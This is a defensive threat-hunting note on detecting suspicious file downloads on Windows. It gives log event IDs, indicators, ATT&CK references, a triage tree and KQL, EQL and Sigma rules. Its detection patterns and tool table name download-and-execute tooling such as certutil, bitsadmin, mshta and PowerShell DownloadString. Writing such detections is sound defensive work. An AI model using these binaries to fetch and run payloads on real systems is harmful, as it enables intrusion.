This note documents detection patterns related to Suspicious Downloading within Windows environments.
Direct Indicators
| Log | Event ID | Meaning | Forensic Value | Notes |
|---|---|---|---|---|
| Security | 4688 | Process creation | Critical | Detects LOLBIN or script-based download commands. |
| Sysmon | 1 | Process creation | Critical | Best execution source for downloader tooling and command line. |
| Sysmon | 3 | Network connection | Critical | Shows outbound connections tied to downloader process. |
| Sysmon | 11 | File create | Critical | Captures downloaded payload landing on disk. |
| Sysmon | 22 | DNS query | High | Reveals remote host resolution before retrieval. |
| PowerShell | 4104 | Script block logging | Critical | Captures Invoke-WebRequest, WebClient, DownloadString. |
| Security | 5156 | Windows Filtering Platform allowed connection | High | Network-level confirmation. |
| Sysmon | 7 | Image loaded | Medium | Useful when downloader loads network libraries unexpectedly. |
Indirect Indicators
| Indicator | What To Look For | Forensic Value | Notes |
|---|---|---|---|
| LOLBIN downloader | certutil, bitsadmin, mshta, rundll32 | Critical | Strong attacker pattern. |
| Script retrieves EXE/DLL/ZIP | File extension from suspicious source | Critical | Payload staging. |
| Browserless download | No browser parent process | High | Suspicious automation. |
| Temp folder payload | File lands in Temp / Public / AppData | Critical | Common attacker path. |
| Immediate execution after download | Child process follows file create | Critical | Classic stage-two chain. |
| Encoded PowerShell retrieval | Base64 + network call | Critical | Fileless staging indicator. |
| External IP or rare domain | Unusual destination | High | Strong enrichment pivot. |
CrypnetUrlCache artifacts | AppData\LocalLow\Microsoft<br>CryptnetUrlCache\MetaData | High | Traces of certutil usage |
Common Tools
| Tool | Usage |
|---|---|
| PowerShell | Invoke-WebRequest, WebClient, DownloadString |
| certutil.exe | Download / decode payload |
| bitsadmin.exe | Background transfer |
| curl.exe | Native file retrieval |
| wget.exe | Linux-style retrieval on Windows |
| mshta.exe | Remote HTA retrieval |
| rundll32.exe | Remote script or DLL retrieval |
| browser automation | Payload fetch via browser engine |
Relevant Artifacts
- Sysmon Event IDs 1, 3, 11, 22
- Security Event ID 4688
- PowerShell 4104
- Security 5156
- Prefetch:
POWERSHELL.EXE,CERTUTIL.EXE,BITSADMIN.EXE,CURL.EXE - Amcache for downloaded payload
- ShimCache for execution chain
- MFT / USN Journal for file creation
- Browser cache if browser involved
- Zone.Identifier ADS
- EDR network lineage
MITRE ATT&CK References
- T1105 Ingress Tool Transfer
- T1059 PowerShell
- T1218 Signed Binary Proxy Execution
- T1071 Application Layer Protocol
Decision Tree
-
Which process downloaded file?
- Parent process
- Command line
-
Network destination?
- Domain
- IP
- Reputation
-
File landed where?
- Temp
- AppData
- Public
-
Was file executed?
- Child process
- DLL load
- Service/task registration
-
Expand:
- Persistence
- Additional downloads
- Beaconing
-
Scope:
- Single host
- Campaign spread
- Shared IOC
Example Detection Templates
KQL
Sysmon
| where EventID == 1
| where CommandLine has_any ("Invoke-WebRequest","DownloadString","certutil","bitsadmin","curl ")
| project TimeGenerated, Computer, User, CommandLine
Sysmon
| where EventID == 3
| project TimeGenerated, Computer, Image, DestinationIp, DestinationHostname
EQL
process where process.command_line like "*Invoke-WebRequest*" or process.command_line like "*certutil*"
sequence by host.name with maxspan=5m
[ process where process.name in ("powershell.exe","certutil.exe","bitsadmin.exe") ]
[ file where file.path like "C:\\Users\\%\\AppData\\%" ]
Sigma
title: Suspicious Download Activity
id: 4a8d77e1-suspicious-download
status: experimental
description: Detects suspicious file retrieval using common attacker tooling
references:
- https://attack.mitre.org/
author: Vergil
date: 2026-03-07
logsource:
product: windows
service: sysmon
detection:
selection:
CommandLine|contains:
- 'Invoke-WebRequest'
- 'DownloadString'
- 'certutil'
- 'bitsadmin'
- 'curl '
condition: selection
fields:
- CommandLine
- ParentImage
falsepositives:
- Administrative downloads
level: high
tags:
- attack.command_and_control
- attack.t1105
Mitigation & Hardening
| Control Area | Mitigation | Effectiveness | Notes |
|---|---|---|---|
| PowerShell logging | Enable 4104 | Critical | Core visibility |
| LOLBIN monitoring | Alert on downloader binaries | Critical | Detect staging early |
| Network controls | Restrict outbound retrieval | High | Reduce payload ingress |
| ADS inspection | Monitor Zone.Identifier | High | Browserless anomalies stand out |
| AppLocker / WDAC | Restrict unsigned payload execution | High | Limits stage-two execution |